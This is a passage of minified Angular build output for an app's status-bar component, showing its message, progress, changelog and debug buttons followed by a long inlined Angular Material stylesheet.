e=Object.values(this.dataService.Project.ProgressTracker);return 0==e.length?"0%":(100*e.filter(i=>1==i).length/e.length).toFixed(0)+"%"}}ShowDebugBtns(){this.showDebug=!this.showDebug}OpenChangelog(){this.dialogService.OpenChangelogDialog()}}return t.\u0275fac=function(e){return new(e||t)(Ee(A2),Ee(Yi),Ee(Wn),Ee(_r),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-status-bar"]],decls:40,vars:15,consts:[[1,"status-bar","background-color-primary"],["mat-icon-button","","tourAnchor","message-history","matTooltipShowDelay","1000",1,"statusBtn",2,"margin-left","10px",3,"matTooltip","click"],[1,"iconBtn"],[2,"font-size","small"],[4,"ngIf"],["mat-icon-button","","tourAnchor","set-progress",1,"statusBtn",2,"margin-left","20px",3,"click"],[1,"buttonAsText","statusBtn",2,"float","right","margin-right","5px",3,"click"],[1,"buttonAsText",2,"cursor","auto","float","right","margin-right","5px","width","30px","height","18px",3,"click"],[1,"iconBtn","material-icons-outlined"],["mat-icon-button","",1,"statusBtn",2,"margin-left","20px",3,"click"],[1,"buttonAsText","statusBtn",3,"click"],["mat-icon-button","","class","statusBtn","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","class","statusBtn","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"statusBtn",2,"margin-left","5px",3,"disabled","matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",1,"statusBtn",3,"matTooltip","click"],["mat-icon-button","","tourAnchor","save-file","matTooltipShowDelay","1000",1,"statusBtn",3,"disabled","matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",1,"statusBtn",3,"disabled","matTooltip","click"],["mat-icon-button","",1,"statusBtn",2,"float","right","margin-right","40px",3,"click"],["mat-icon-button","",1,"statusBtn",2,"float","right","margin-right","5px",3,"click"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n "),m(2,"button",1),he("click",function(){return i.messagesService.ShowHistory()}),oe(3,"translate"),s(4,"\n "),m(5,"mat-icon",2),s(6,"error_outline"),u(),m(7,"span",3),s(8),u(),s(9," \n "),m(10,"mat-icon",2),s(11,"warning_amber"),u(),m(12,"span",3),s(13),u(),s(14,"\n "),ne(15,jst,4,1,"ng-container",4),s(16,"\n "),ne(17,Qst,4,1,"ng-container",4),s(18,"\n "),u(),s(19,"\n \n "),ne(20,Jst,57,24,"ng-container",4),s(21,"\n "),m(22,"button",5),he("click",function(){return i.dialogService.OpenProgresstrackerDialog()}),s(23,"\n "),m(24,"mat-icon",2),s(25,"trending_up"),u(),s(26),oe(27,"translate"),ne(28,Zst,2,1,"span",4),ne(29,ect,2,0,"span",4),s(30,"\n "),u(),s(31,"\n "),m(32,"button",6),he("click",function(){return i.OpenChangelog()}),s(33),u(),s(34,"\n "),m(35,"button",7),he("click",function(){return i.ShowDebugBtns()}),s(36,"\n "),u(),s(37,"\n "),ne(38,tct,20,0,"ng-container",4),s(39,"\n"),u()),2&e&&(g(2),at("matTooltip",re(3,11,"status-bar.messages")),g(6),ke(i.messagesService.ErrorMsgs.length),g(5),ke(i.messagesService.WarningMsgs.length),g(2),F("ngIf",i.messagesService.ShowSuccesses),g(2),F("ngIf",i.messagesService.ShowInfos),g(3),F("ngIf",i.dataService.Project||i.dataService.Config),g(6),ct("",re(27,13,"status-bar.progress"),": "),g(2),F("ngIf",i.dataService.Project),g(1),F("ngIf",!i.dataService.Project),g(4),ct("\n v",i.version,"\n "),g(5),F("ngIf",i.showDebug))},dependencies:[Ri,qq,oa,da,Pa,Xi],styles:['.mat-badge-content[_ngcontent-%COMP%]{font-weight:600;font-size:12px;font-family:Roboto,Helvetica Neue,sans-serif}.mat-badge-small[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{font-size:9px}.mat-badge-large[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{font-size:24px}.mat-h1[_ngcontent-%COMP%], .mat-headline[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-h1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-headline[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] h1[_ngcontent-%COMP%]{font:400 24px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h2[_ngcontent-%COMP%], .mat-title[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-h2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-title[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] h2[_ngcontent-%COMP%]{font:500 20px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h3[_ngcontent-%COMP%], .mat-subheading-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-h3[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-subheading-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] h3[_ngcontent-%COMP%]{font:400 16px/28px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h4[_ngcontent-%COMP%], .mat-subheading-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-h4[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-subheading-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] h4[_ngcontent-%COMP%]{font:400 15px/24px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h5[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-h5[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] h5[_ngcontent-%COMP%]{font:400 11.62px/20px Roboto,Helvetica Neue,sans-serif;margin:0 0 12px}.mat-h6[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-h6[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] h6[_ngcontent-%COMP%]{font:400 9.38px/20px Roboto,Helvetica Neue,sans-serif;margin:0 0 12px}.mat-body-strong[_ngcontent-%COMP%], .mat-body-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-body-strong[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-body-2[_ngcontent-%COMP%]{font:500 14px/24px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-body[_ngcontent-%COMP%], .mat-body-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-body[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-body-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%]{font:400 14px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-body[_ngcontent-%COMP%] p[_ngcontent-%COMP%], .mat-body-1[_ngcontent-%COMP%] p[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-body[_ngcontent-%COMP%] p[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-body-1[_ngcontent-%COMP%] p[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] p[_ngcontent-%COMP%]{margin:0 0 12px}.mat-small[_ngcontent-%COMP%], .mat-caption[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-small[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-caption[_ngcontent-%COMP%]{font:400 12px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-display-4[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-display-4[_ngcontent-%COMP%]{font:300 112px/112px Roboto,Helvetica Neue,sans-serif;letter-spacing:-.05em;margin:0 0 56px}.mat-display-3[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-display-3[_ngcontent-%COMP%]{font:400 56px/56px Roboto,Helvetica Neue,sans-serif;letter-spacing:-.02em;margin:0 0 64px}.mat-display-2[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-display-2[_ngcontent-%COMP%]{font:400 45px/48px Roboto,Helvetica Neue,sans-serif;letter-spacing:-.005em;margin:0 0 64px}.mat-display-1[_ngcontent-%COMP%], .mat-typography[_ngcontent-%COMP%] .mat-display-1[_ngcontent-%COMP%]{font:400 34px/40px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0 0 64px}.mat-bottom-sheet-container[_ngcontent-%COMP%]{font:400 14px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-button[_ngcontent-%COMP%], .mat-raised-button[_ngcontent-%COMP%], .mat-icon-button[_ngcontent-%COMP%], .mat-stroked-button[_ngcontent-%COMP%], .mat-flat-button[_ngcontent-%COMP%], .mat-fab[_ngcontent-%COMP%], .mat-mini-fab[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:500}.mat-button-toggle[_ngcontent-%COMP%], .mat-card[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-card-title[_ngcontent-%COMP%]{font-size:24px;font-weight:500}.mat-card-header[_ngcontent-%COMP%] .mat-card-title[_ngcontent-%COMP%]{font-size:20px}.mat-card-subtitle[_ngcontent-%COMP%], .mat-card-content[_ngcontent-%COMP%]{font-size:14px}.mat-checkbox[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-checkbox-layout[_ngcontent-%COMP%] .mat-checkbox-label[_ngcontent-%COMP%]{line-height:24px}.mat-chip[_ngcontent-%COMP%]{font-size:14px;font-weight:500}.mat-chip[_ngcontent-%COMP%] .mat-chip-trailing-icon.mat-icon[_ngcontent-%COMP%], .mat-chip[_ngcontent-%COMP%] .mat-chip-remove.mat-icon[_ngcontent-%COMP%]{font-size:18px}.mat-table[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-header-cell[_ngcontent-%COMP%]{font-size:12px;font-weight:500}.mat-cell[_ngcontent-%COMP%], .mat-footer-cell[_ngcontent-%COMP%]{font-size:14px}.mat-calendar[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-calendar-body[_ngcontent-%COMP%]{font-size:13px}.mat-calendar-body-label[_ngcontent-%COMP%], .mat-calendar-period-button[_ngcontent-%COMP%]{font-size:14px;font-weight:500}.mat-calendar-table-header[_ngcontent-%COMP%] th[_ngcontent-%COMP%]{font-size:11px;font-weight:400}.mat-dialog-title[_ngcontent-%COMP%]{font:500 20px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-expansion-panel-header[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:15px;font-weight:400}.mat-expansion-panel-content[_ngcontent-%COMP%]{font:400 14px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-form-field[_ngcontent-%COMP%]{font-size:inherit;font-weight:400;line-height:1.125;font-family:Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-form-field-wrapper[_ngcontent-%COMP%]{padding-bottom:1.34375em}.mat-form-field-prefix[_ngcontent-%COMP%] .mat-icon[_ngcontent-%COMP%], .mat-form-field-suffix[_ngcontent-%COMP%] .mat-icon[_ngcontent-%COMP%]{font-size:150%;line-height:1.125}.mat-form-field-prefix[_ngcontent-%COMP%] .mat-icon-button[_ngcontent-%COMP%], .mat-form-field-suffix[_ngcontent-%COMP%] .mat-icon-button[_ngcontent-%COMP%]{height:1.5em;width:1.5em}.mat-form-field-prefix[_ngcontent-%COMP%] .mat-icon-button[_ngcontent-%COMP%] .mat-icon[_ngcontent-%COMP%], .mat-form-field-suffix[_ngcontent-%COMP%] .mat-icon-button[_ngcontent-%COMP%] .mat-icon[_ngcontent-%COMP%]{height:1.125em;line-height:1.125}.mat-form-field-infix[_ngcontent-%COMP%]{padding:.5em 0;border-top:.84375em solid transparent}.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-can-float[_ngcontent-%COMP%] .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.34375em) scale(.75);width:133.3333333333%}.mat-form-field-can-float[_ngcontent-%COMP%] .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.34374em) scale(.75);width:133.3333433333%}.mat-form-field-label-wrapper[_ngcontent-%COMP%]{top:-.84375em;padding-top:.84375em}.mat-form-field-label[_ngcontent-%COMP%]{top:1.34375em}.mat-form-field-underline[_ngcontent-%COMP%]{bottom:1.34375em}.mat-form-field-subscript-wrapper[_ngcontent-%COMP%]{font-size:75%;margin-top:.6666666667em;top:calc(100% - 1.7916666667em)}.mat-form-field-appearance-legacy[_ngcontent-%COMP%] .mat-form-field-wrapper[_ngcontent-%COMP%]{padding-bottom:1.25em}.mat-form-field-appearance-legacy[_ngcontent-%COMP%] .mat-form-field-infix[_ngcontent-%COMP%]{padding:.4375em 0}.mat-form-field-appearance-legacy.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%] .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.001px);width:133.3333333333%}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%] .mat-form-field-autofill-control[_ngcontent-%COMP%]:-webkit-autofill + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.00101px);width:133.3333433333%}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%] .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28125em) scale(.75) perspective(100px) translateZ(.00102px);width:133.3333533333%}.mat-form-field-appearance-legacy[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{top:1.28125em}.mat-form-field-appearance-legacy[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]{bottom:1.25em}.mat-form-field-appearance-legacy[_ngcontent-%COMP%] .mat-form-field-subscript-wrapper[_ngcontent-%COMP%]{margin-top:.5416666667em;top:calc(100% - 1.6666666667em)}@media print{.mat-form-field-appearance-legacy.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%] .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28122em) scale(.75)}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%] .mat-form-field-autofill-control[_ngcontent-%COMP%]:-webkit-autofill + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.28121em) scale(.75)}.mat-form-field-appearance-legacy.mat-form-field-can-float[_ngcontent-%COMP%] .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.2812em) scale(.75)}}.mat-form-field-appearance-fill[_ngcontent-%COMP%] .mat-form-field-infix[_ngcontent-%COMP%]{padding:.25em 0 .75em}.mat-form-field-appearance-fill[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{top:1.09375em;margin-top:-.5em}.mat-form-field-appearance-fill.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-fill.mat-form-field-can-float[_ngcontent-%COMP%] .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-.59375em) scale(.75);width:133.3333333333%}.mat-form-field-appearance-fill.mat-form-field-can-float[_ngcontent-%COMP%] .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-.59374em) scale(.75);width:133.3333433333%}.mat-form-field-appearance-outline[_ngcontent-%COMP%] .mat-form-field-infix[_ngcontent-%COMP%]{padding:1em 0}.mat-form-field-appearance-outline[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{top:1.84375em;margin-top:-.25em}.mat-form-field-appearance-outline.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-outline.mat-form-field-can-float[_ngcontent-%COMP%] .mat-input-server[_ngcontent-%COMP%]:focus + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.59375em) scale(.75);width:133.3333333333%}.mat-form-field-appearance-outline.mat-form-field-can-float[_ngcontent-%COMP%] .mat-input-server[label][_ngcontent-%COMP%]:not(:label-shown) + .mat-form-field-label-wrapper[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{transform:translateY(-1.59374em) scale(.75);width:133.3333433333%}.mat-grid-tile-header[_ngcontent-%COMP%], .mat-grid-tile-footer[_ngcontent-%COMP%]{font-size:14px}.mat-grid-tile-header[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%], .mat-grid-tile-footer[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-grid-tile-header[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%]:nth-child(n+2), .mat-grid-tile-footer[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:12px}input.mat-input-element[_ngcontent-%COMP%]{margin-top:-.0625em}.mat-menu-item[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:400}.mat-paginator[_ngcontent-%COMP%], .mat-paginator-page-size[_ngcontent-%COMP%] .mat-select-trigger[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:12px}.mat-radio-button[_ngcontent-%COMP%], .mat-select[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-select-trigger[_ngcontent-%COMP%]{height:1.125em}.mat-slide-toggle-content[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-slider-thumb-label-text[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:12px;font-weight:500}.mat-stepper-vertical[_ngcontent-%COMP%], .mat-stepper-horizontal[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-step-label[_ngcontent-%COMP%]{font-size:14px;font-weight:400}.mat-step-sub-label-error[_ngcontent-%COMP%]{font-weight:400}.mat-step-label-error[_ngcontent-%COMP%]{font-size:14px}.mat-step-label-selected[_ngcontent-%COMP%]{font-size:14px;font-weight:500}.mat-tab-group[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-tab-label[_ngcontent-%COMP%], .mat-tab-link[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:500}.mat-toolbar[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] h1[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] h2[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] h3[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] h4[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] h5[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] h6[_ngcontent-%COMP%]{font:500 20px/32px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;margin:0}.mat-tooltip[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:10px;padding-top:6px;padding-bottom:6px}.mat-tooltip-handset[_ngcontent-%COMP%]{font-size:14px;padding-top:8px;padding-bottom:8px}.mat-list-item[_ngcontent-%COMP%], .mat-list-option[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-list-base[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{font-size:16px}.mat-list-base[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:14px}.mat-list-base[_ngcontent-%COMP%] .mat-list-option[_ngcontent-%COMP%]{font-size:16px}.mat-list-base[_ngcontent-%COMP%] .mat-list-option[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[_ngcontent-%COMP%] .mat-list-option[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:14px}.mat-list-base[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px;font-weight:500}.mat-list-base[dense][_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[dense][_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%] .mat-list-option[_ngcontent-%COMP%]{font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%] .mat-list-option[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[dense][_ngcontent-%COMP%] .mat-list-option[_ngcontent-%COMP%] .mat-line[_ngcontent-%COMP%]:nth-child(n+2){font-size:12px}.mat-list-base[dense][_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:12px;font-weight:500}.mat-option[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:16px}.mat-optgroup-label[_ngcontent-%COMP%]{font:500 14px/24px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal}.mat-simple-snackbar[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif;font-size:14px}.mat-simple-snackbar-action[_ngcontent-%COMP%]{line-height:1;font-family:inherit;font-size:inherit;font-weight:500}.mat-tree[_ngcontent-%COMP%]{font-family:Roboto,Helvetica Neue,sans-serif}.mat-tree-node[_ngcontent-%COMP%], .mat-nested-tree-node[_ngcontent-%COMP%]{font-weight:400;font-size:14px}.mat-ripple[_ngcontent-%COMP%]{overflow:hidden;position:relative}.mat-ripple[_ngcontent-%COMP%]:not(:empty){transform:translateZ(0)}.mat-ripple.mat-ripple-unbounded[_ngcontent-%COMP%]{overflow:visible}.mat-ripple-element[_ngcontent-%COMP%]{position:absolute;border-radius:50%;pointer-events:none;transition:opacity,transform 0ms cubic-bezier(0,0,.2,1);transform:scale3d(0,0,0)}.cdk-high-contrast-active[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{display:none}.cdk-visually-hidden[_ngcontent-%COMP%]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;white-space:nowrap;outline:0;-webkit-appearance:none;-moz-appearance:none;left:0}[dir=rtl][_ngcontent-%COMP%] .cdk-visually-hidden[_ngcontent-%COMP%]{left:auto;right:0}.cdk-overlay-container[_ngcontent-%COMP%], .cdk-global-overlay-wrapper[_ngcontent-%COMP%]{pointer-events:none;top:0;left:0;height:100%;width:100%}.cdk-overlay-container[_ngcontent-%COMP%]{position:fixed;z-index:1000}.cdk-overlay-container[_ngcontent-%COMP%]:empty{display:none}.cdk-global-overlay-wrapper[_ngcontent-%COMP%]{display:flex;position:absolute;z-index:1000}.cdk-overlay-pane[_ngcontent-%COMP%]{position:absolute;pointer-events:auto;box-sizing:border-box;z-index:1000;display:flex;max-width:100%;max-height:100%}.cdk-overlay-backdrop[_ngcontent-%COMP%]{position:absolute;inset:0;z-index:1000;pointer-events:auto;-webkit-tap-highlight-color:transparent;transition:opacity .4s cubic-bezier(.25,.8,.25,1);opacity:0}.cdk-overlay-backdrop.cdk-overlay-backdrop-showing[_ngcontent-%COMP%]{opacity:1}.cdk-high-contrast-active[_ngcontent-%COMP%] .cdk-overlay-backdrop.cdk-overlay-backdrop-showing[_ngcontent-%COMP%]{opacity:.6}.cdk-overlay-dark-backdrop[_ngcontent-%COMP%]{background:rgba(0,0,0,.32)}.cdk-overlay-transparent-backdrop[_ngcontent-%COMP%]{transition:visibility 1ms linear,opacity 1ms linear;visibility:hidden;opacity:1}.cdk-overlay-transparent-backdrop.cdk-overlay-backdrop-showing[_ngcontent-%COMP%]{opacity:0;visibility:visible}.cdk-overlay-backdrop-noop-animation[_ngcontent-%COMP%]{transition:none}.cdk-overlay-connected-position-bounding-box[_ngcontent-%COMP%]{position:absolute;z-index:1000;display:flex;flex-direction:column;min-width:1px;min-height:1px}.cdk-global-scrollblock[_ngcontent-%COMP%]{position:fixed;width:100%;overflow-y:scroll}textarea.cdk-textarea-autosize[_ngcontent-%COMP%]{resize:none}textarea.cdk-textarea-autosize-measuring[_ngcontent-%COMP%]{padding:2px 0!important;box-sizing:content-box!important;height:auto!important;overflow:hidden!important}textarea.cdk-textarea-autosize-measuring-firefox[_ngcontent-%COMP%]{padding:2px 0!important;box-sizing:content-box!important;height:0!important}@keyframes cdk-text-field-autofill-start{}@keyframes cdk-text-field-autofill-end{}.cdk-text-field-autofill-monitored[_ngcontent-%COMP%]:-webkit-autofill{animation:cdk-text-field-autofill-start 0s 1ms}.cdk-text-field-autofill-monitored[_ngcontent-%COMP%]:not(:-webkit-autofill){animation:cdk-text-field-autofill-end 0s 1ms}.mat-focus-indicator[_ngcontent-%COMP%]{position:relative}.mat-focus-indicator[_ngcontent-%COMP%]:before{inset:0;position:absolute;box-sizing:border-box;pointer-events:none;display:var(--mat-focus-indicator-display, none);border:var(--mat-focus-indicator-border-width, 3px) var(--mat-focus-indicator-border-style, solid) var(--mat-focus-indicator-border-color, transparent);border-radius:var(--mat-focus-indicator-border-radius, 4px)}.mat-focus-indicator[_ngcontent-%COMP%]:focus:before{content:""}.cdk-high-contrast-active[_ngcontent-%COMP%]{--mat-focus-indicator-display: block}.mat-mdc-focus-indicator[_ngcontent-%COMP%]{position:relative}.mat-mdc-focus-indicator[_ngcontent-%COMP%]:before{inset:0;position:absolute;box-sizing:border-box;pointer-events:none;display:var(--mat-mdc-focus-indicator-display, none);border:var(--mat-mdc-focus-indicator-border-width, 3px) var(--mat-mdc-focus-indicator-border-style, solid) var(--mat-mdc-focus-indicator-border-color, transparent);border-radius:var(--mat-mdc-focus-indicator-border-radius, 4px)}.mat-mdc-focus-indicator[_ngcontent-%COMP%]:focus:before{content:""}.cdk-high-contrast-active[_ngcontent-%COMP%]{--mat-mdc-focus-indicator-display: block}.mat-ripple-element[_ngcontent-%COMP%]{background-color:#0000001a}.mat-option[_ngcontent-%COMP%]{color:#000000de}.mat-option[_ngcontent-%COMP%]:hover:not(.mat-option-disabled), .mat-option[_ngcontent-%COMP%]:focus:not(.mat-option-disabled){background:rgba(0,0,0,.04)}.mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple):not(.mat-option-disabled){background:rgba(0,0,0,.04)}.mat-option.mat-active[_ngcontent-%COMP%]{background:rgba(0,0,0,.04);color:#000000de}.mat-option.mat-option-disabled[_ngcontent-%COMP%]{color:#00000061}.mat-primary[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#2196f3}.mat-accent[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#7b1fa2}.mat-warn[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#f44336}.mat-optgroup-label[_ngcontent-%COMP%]{color:#0000008a}.mat-optgroup-disabled[_ngcontent-%COMP%] .mat-optgroup-label[_ngcontent-%COMP%]{color:#00000061}.mat-pseudo-checkbox[_ngcontent-%COMP%]{color:#0000008a}.mat-pseudo-checkbox[_ngcontent-%COMP%]:after{color:#f5f5f5}.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{color:#b0b0b0}.mat-primary[_ngcontent-%COMP%] .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], 